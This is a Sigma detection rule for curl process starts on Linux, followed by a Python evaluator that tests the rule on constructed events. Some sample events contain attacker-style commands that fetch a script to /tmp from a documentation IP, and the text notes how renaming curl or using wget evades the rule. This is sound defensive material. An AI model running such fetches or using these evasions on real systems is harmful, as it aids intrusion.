Curl Usage on Linux

Detects the start of a curl process on Linux, which typically indicates either a file download from a remote host or a simple web request to a remote server. The rule matches only on the executable path, so it fires on every curl invocation and is rated low; it is meant as a building block for hunting and correlation rather than a stand-alone alert.

Sigma rule

title: Curl Usage on Linux
id: ea34fb97-e2c4-4afb-810f-785e4459b194
status: test
description: Detects a curl process start on Linux, which indicates a file download from a remote location or a simple web request to a remote server
references:
    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022/09/15
tags:
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/curl'
    condition: selection
falsepositives:
    - Scripts created by developers and admins
    - Administrative activity
level: low
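The following is an added example, not code from the Sigma project or the rule author: a small evaluator that applies the rule's single selection (`Image|endswith: '/curl'`, which Sigma matches case-insensitively by default) to a handful of constructed Linux process_creation events, plus a triage helper that suppresses the false-positive sources the rule lists. The sample events, user names, paths and the 203.0.113.10 address are all made up for illustration. It also shows what the rule does not catch: wget, and a copy of curl executed under another name, both slip past an image-path match, which is why the rule is rated low and is best used as a pivot rather than an alert.

```python
"""Evaluate the 'Curl Usage on Linux' selection over constructed process_creation events."""
from typing import Dict, Iterable, List, Set

# Constructed sample events (not real logs) in the field shape a Sigma
# process_creation log source exposes on Linux.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # Suspicious: web-server user pulling a script to /tmp
    {"Image": "/usr/bin/curl",
     "CommandLine": "curl -s http://203.0.113.10/x.sh -o /tmp/x.sh",
     "User": "www-data"},
    # Benign: deploy account hitting a health endpoint
    {"Image": "/usr/bin/curl",
     "CommandLine": "curl -fsSL https://example.org/healthz",
     "User": "deploy"},
    # Uppercase path: Sigma string matching is case-insensitive, so this matches
    {"Image": "/USR/LOCAL/BIN/CURL",
     "CommandLine": "CURL http://203.0.113.10/",
     "User": "root"},
    # Not caught: a different downloader
    {"Image": "/usr/bin/wget",
     "CommandLine": "wget http://203.0.113.10/x.sh",
     "User": "www-data"},
    # Not caught: curl copied to a different name (image path no longer ends in /curl)
    {"Image": "/tmp/.c",
     "CommandLine": "/tmp/.c http://203.0.113.10/x.sh",
     "User": "www-data"},
    # Not caught: 'endswith' requires the path separator before 'curl'
    {"Image": "/opt/tools/curlx",
     "CommandLine": "curlx --version",
     "User": "root"},
]


def matches_rule(event: Dict[str, str]) -> bool:
    """Implements the rule's selection: Image|endswith '/curl'.

    Sigma treats string values as case-insensitive unless the 'cased'
    modifier is used, so both sides are lower-cased before comparing.
    """
    image = event.get("Image", "")
    return image.lower().endswith("/curl")


def run_rule(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the events that satisfy 'condition: selection'."""
    return [e for e in events if matches_rule(e)]


def triage(events: Iterable[Dict[str, str]],
           allowed_users: Set[str]) -> List[Dict[str, str]]:
    """Post-filter for the rule's listed false positives.

    Hypothetical tuning step: drop hits from accounts whose curl use is
    expected (admin/deploy automation) so analysts see the remainder.
    """
    return [e for e in run_rule(events) if e.get("User") not in allowed_users]


if __name__ == "__main__":
    for hit in run_rule(SAMPLE_EVENTS):
        print("HIT  ", hit["Image"], "|", hit["CommandLine"])
    print("---- after triage ----")
    for hit in triage(SAMPLE_EVENTS, allowed_users={"deploy"}):
        print("REVIEW", hit["User"], "|", hit["CommandLine"])
```

Run it as-is to see three hits and, after the triage allowlist, the two that a human should look at. Swapping the evaluator for a real Sigma backend does not change the outcome: any detection keyed only on the binary's path is trivially bypassed by renaming or by using wget, python, or a shell built-in, so correlate curl hits with the command line (URL, -o/-O targets, world-writable output paths) and the parent process rather than alerting on the path alone.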
